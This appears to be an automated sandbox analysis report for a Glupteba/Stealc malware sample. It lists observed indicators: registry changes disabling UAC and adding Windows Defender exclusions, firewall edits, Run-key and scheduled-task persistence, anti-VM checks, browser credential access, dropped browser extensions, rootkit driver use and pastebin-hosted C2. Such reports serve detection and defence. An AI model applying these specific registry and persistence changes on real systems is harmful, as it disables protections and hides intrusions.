glupteba | f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005

Windows Service

T1543.003

Processes:

bhJ3c6tgDurzcpzQl6wOvaig.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	bhJ3c6tgDurzcpzQl6wOvaig.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc

UAC bypass 3 TTPs 1 IoCs

Bypass User Account Control

T1548.002

Disable or Modify Tools

Modify Registry

Processes:

f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe

Windows security bypass 2 TTPs 7 IoCs

Disable or Modify Tools

Modify Registry

Processes:

bhJ3c6tgDurzcpzQl6wOvaig.exef6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exebFP7y9UvwrglmZsCw0P01TLb.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1"	bhJ3c6tgDurzcpzQl6wOvaig.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe = "0"	f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	bFP7y9UvwrglmZsCw0P01TLb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	bFP7y9UvwrglmZsCw0P01TLb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	bFP7y9UvwrglmZsCw0P01TLb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	bFP7y9UvwrglmZsCw0P01TLb.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

bhJ3c6tgDurzcpzQl6wOvaig.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bhJ3c6tgDurzcpzQl6wOvaig.exe
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 2 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exe

pid process

1492 netsh.exe
4020 netsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	bhJ3c6tgDurzcpzQl6wOvaig.exe

pid	process
1492	netsh.exe
4020	netsh.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

bhJ3c6tgDurzcpzQl6wOvaig.exeInstall.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	bhJ3c6tgDurzcpzQl6wOvaig.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	bhJ3c6tgDurzcpzQl6wOvaig.exe

Drops startup file 7 IoCs

Processes:

msbuild.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bi5ArxoH3xu7KKYZB9hWVCBQ.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JQuYPweB9mUBtAYnBSSwGqm1.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JimjflcomHsPv3uUmFOvOtHN.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BN23n6V67cy59QSV4Bkgn3kx.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7zU2mgqH6s6OTuxRj9mimDwJ.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\egKT9gDeS7DBs82FbZN139M3.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\esvfwQdMsBtn6PQYeKks07nf.bat	msbuild.exe

Executes dropped EXE 19 IoCs

Processes:

AHnLC4HTPoTQBvfFYTDQGgzq.exePBodhKQkwYo4944fGYN6aCTn.exebFP7y9UvwrglmZsCw0P01TLb.exeu384.0.exePBodhKQkwYo4944fGYN6aCTn.exebFP7y9UvwrglmZsCw0P01TLb.exerun.execsrss.exeu384.3.exebhJ3c6tgDurzcpzQl6wOvaig.exeinjector.exeSzKigIDAe1j2pUJtKhKBZnNC.exeInstall.exewindefender.exewindefender.exeCTcEGVlSRrBrhp7BbbxeNOFp.exeInstall.exetEGeVxK.exeDslOhGm.exe

pid	process
4180	AHnLC4HTPoTQBvfFYTDQGgzq.exe
3144	PBodhKQkwYo4944fGYN6aCTn.exe
1596	bFP7y9UvwrglmZsCw0P01TLb.exe
476	u384.0.exe
4996	PBodhKQkwYo4944fGYN6aCTn.exe
3692	bFP7y9UvwrglmZsCw0P01TLb.exe
2496	run.exe
2916	csrss.exe
3624	u384.3.exe
1524	bhJ3c6tgDurzcpzQl6wOvaig.exe
1080	injector.exe
556	SzKigIDAe1j2pUJtKhKBZnNC.exe
3544	Install.exe
768	windefender.exe
2088	windefender.exe
4444	CTcEGVlSRrBrhp7BbbxeNOFp.exe
1700	Install.exe
4404	tEGeVxK.exe
3000	DslOhGm.exe

Loads dropped DLL 1 IoCs

Processes:

run.exe

pid process

2496 run.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
2496	run.exe

Themida packer 9 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\bhJ3c6tgDurzcpzQl6wOvaig.exe	themida
behavioral2/memory/1524-507-0x00007FF7AE000000-0x00007FF7AE745000-memory.dmp	themida
behavioral2/memory/1524-509-0x00007FF7AE000000-0x00007FF7AE745000-memory.dmp	themida
behavioral2/memory/1524-510-0x00007FF7AE000000-0x00007FF7AE745000-memory.dmp	themida
behavioral2/memory/1524-511-0x00007FF7AE000000-0x00007FF7AE745000-memory.dmp	themida
behavioral2/memory/1524-512-0x00007FF7AE000000-0x00007FF7AE745000-memory.dmp	themida
behavioral2/memory/1524-516-0x00007FF7AE000000-0x00007FF7AE745000-memory.dmp	themida
behavioral2/memory/1524-519-0x00007FF7AE000000-0x00007FF7AE745000-memory.dmp	themida
behavioral2/memory/1524-520-0x00007FF7AE000000-0x00007FF7AE745000-memory.dmp	themida

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\windefender.exe	upx
behavioral2/memory/768-768-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral2/memory/2088-772-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral2/memory/2088-831-0x0000000000400000-0x00000000008DF000-memory.dmp	upx

Windows security modification 2 TTPs 8 IoCs

Disable or Modify Tools

Modify Registry

Processes:

bFP7y9UvwrglmZsCw0P01TLb.exebhJ3c6tgDurzcpzQl6wOvaig.exef6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	bFP7y9UvwrglmZsCw0P01TLb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	bFP7y9UvwrglmZsCw0P01TLb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	bFP7y9UvwrglmZsCw0P01TLb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	bFP7y9UvwrglmZsCw0P01TLb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1"	bhJ3c6tgDurzcpzQl6wOvaig.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions	f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe = "0"	f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

Processes:

csrss.exebFP7y9UvwrglmZsCw0P01TLb.exePBodhKQkwYo4944fGYN6aCTn.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-834482027-582050234-2368284635-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-834482027-582050234-2368284635-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	bFP7y9UvwrglmZsCw0P01TLb.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-834482027-582050234-2368284635-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	PBodhKQkwYo4944fGYN6aCTn.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

System Information Discovery

Processes:

f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exebhJ3c6tgDurzcpzQl6wOvaig.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	bhJ3c6tgDurzcpzQl6wOvaig.exe

Drops Chrome extension 1 IoCs

Processes:

DslOhGm.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	DslOhGm.exe

Drops desktop.ini file(s) 1 IoCs

Processes:

DslOhGm.exe

description ioc process

File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini DslOhGm.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

1 pastebin.com
2 pastebin.com
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

37 ipinfo.io
10 ipinfo.io
17 api.myip.com
36 api.myip.com
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMonFS csrss.exe

description	ioc	process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	DslOhGm.exe

flow	ioc
1	pastebin.com
2	pastebin.com

flow	ioc
37	ipinfo.io
10	ipinfo.io
17	api.myip.com
36	api.myip.com

description	ioc	process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 42 IoCs

Processes:

powershell.exepowershell.exetEGeVxK.exeDslOhGm.exepowershell.exepowershell.exebhJ3c6tgDurzcpzQl6wOvaig.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	tEGeVxK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15	DslOhGm.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	bhJ3c6tgDurzcpzQl6wOvaig.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	bhJ3c6tgDurzcpzQl6wOvaig.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	DslOhGm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	DslOhGm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	DslOhGm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	DslOhGm.exe
File opened for modification	C:\Windows\System32\GroupPolicy	bhJ3c6tgDurzcpzQl6wOvaig.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	bhJ3c6tgDurzcpzQl6wOvaig.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	tEGeVxK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	DslOhGm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	DslOhGm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	DslOhGm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	DslOhGm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_F035812844FEE93DCDCC1CD3A7F24400	DslOhGm.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	DslOhGm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	DslOhGm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_1D54DE53BDE89F59AF362E74369EB397	DslOhGm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_F035812844FEE93DCDCC1CD3A7F24400	DslOhGm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	DslOhGm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	DslOhGm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15	DslOhGm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	DslOhGm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_1D54DE53BDE89F59AF362E74369EB397	DslOhGm.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	DslOhGm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	DslOhGm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	DslOhGm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	DslOhGm.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

bhJ3c6tgDurzcpzQl6wOvaig.exe

pid process

1524 bhJ3c6tgDurzcpzQl6wOvaig.exe

pid	process
1524	bhJ3c6tgDurzcpzQl6wOvaig.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exerun.execmd.exe

description	pid	process	target process
PID 4564 set thread context of 4992	4564	f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe	msbuild.exe
PID 2496 set thread context of 2468	2496	run.exe	cmd.exe
PID 2468 set thread context of 3524	2468	cmd.exe	MSBuild.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

Processes:

PBodhKQkwYo4944fGYN6aCTn.exebFP7y9UvwrglmZsCw0P01TLb.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	PBodhKQkwYo4944fGYN6aCTn.exe
File opened (read-only)	\??\VBoxMiniRdrDN	bFP7y9UvwrglmZsCw0P01TLb.exe

Drops file in Program Files directory 6 IoCs

Processes:

DslOhGm.exe

description	ioc	process
File created	C:\Program Files (x86)\ByWuwrOBU\wLcbel.dll	DslOhGm.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	DslOhGm.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	DslOhGm.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	DslOhGm.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	DslOhGm.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	DslOhGm.exe

Drops file in Windows directory 10 IoCs

Processes:

PBodhKQkwYo4944fGYN6aCTn.exeschtasks.exeschtasks.exeschtasks.exebFP7y9UvwrglmZsCw0P01TLb.execsrss.exeschtasks.exe

description	ioc	process
File created	C:\Windows\rss\csrss.exe	PBodhKQkwYo4944fGYN6aCTn.exe
File created	C:\Windows\Tasks\bWycNackLSywaqkmgR.job	schtasks.exe
File opened for modification	C:\Windows\Tasks\bWycNackLSywaqkmgR.job	schtasks.exe
File created	C:\Windows\Tasks\BAnwxolbGpCzXNxkj.job	schtasks.exe
File opened for modification	C:\Windows\rss	bFP7y9UvwrglmZsCw0P01TLb.exe
File created	C:\Windows\rss\csrss.exe	bFP7y9UvwrglmZsCw0P01TLb.exe
File opened for modification	C:\Windows\rss	PBodhKQkwYo4944fGYN6aCTn.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\Tasks\qbSDwEgyNYPZlGA.job	schtasks.exe

Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

4760 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

3272 476 WerFault.exe u384.0.exe
1660 4180 WerFault.exe AHnLC4HTPoTQBvfFYTDQGgzq.exe

pid	process
4760	sc.exe

pid	pid_target	process	target process
3272	476	WerFault.exe	u384.0.exe
1660	4180	WerFault.exe	AHnLC4HTPoTQBvfFYTDQGgzq.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

u384.3.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u384.3.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u384.3.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u384.3.exe

Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2840 schtasks.exe
5016 schtasks.exe
4760 schtasks.exe
1468 schtasks.exe
4388 schtasks.exe
1680 schtasks.exe
4180 schtasks.exe

pid	process
2840	schtasks.exe
5016	schtasks.exe
4760	schtasks.exe
1468	schtasks.exe
4388	schtasks.exe
1680	schtasks.exe
4180	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

Processes:

Install.exeInstall.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exewindefender.exebFP7y9UvwrglmZsCw0P01TLb.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetEGeVxK.exepowershell.exeDslOhGm.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-532 = "Sri Lanka Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time"	bFP7y9UvwrglmZsCw0P01TLb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-151 = "Central America Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1862 = "Russia TZ 6 Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	bFP7y9UvwrglmZsCw0P01TLb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	bFP7y9UvwrglmZsCw0P01TLb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time"	bFP7y9UvwrglmZsCw0P01TLb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "0"	tEGeVxK.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	bFP7y9UvwrglmZsCw0P01TLb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
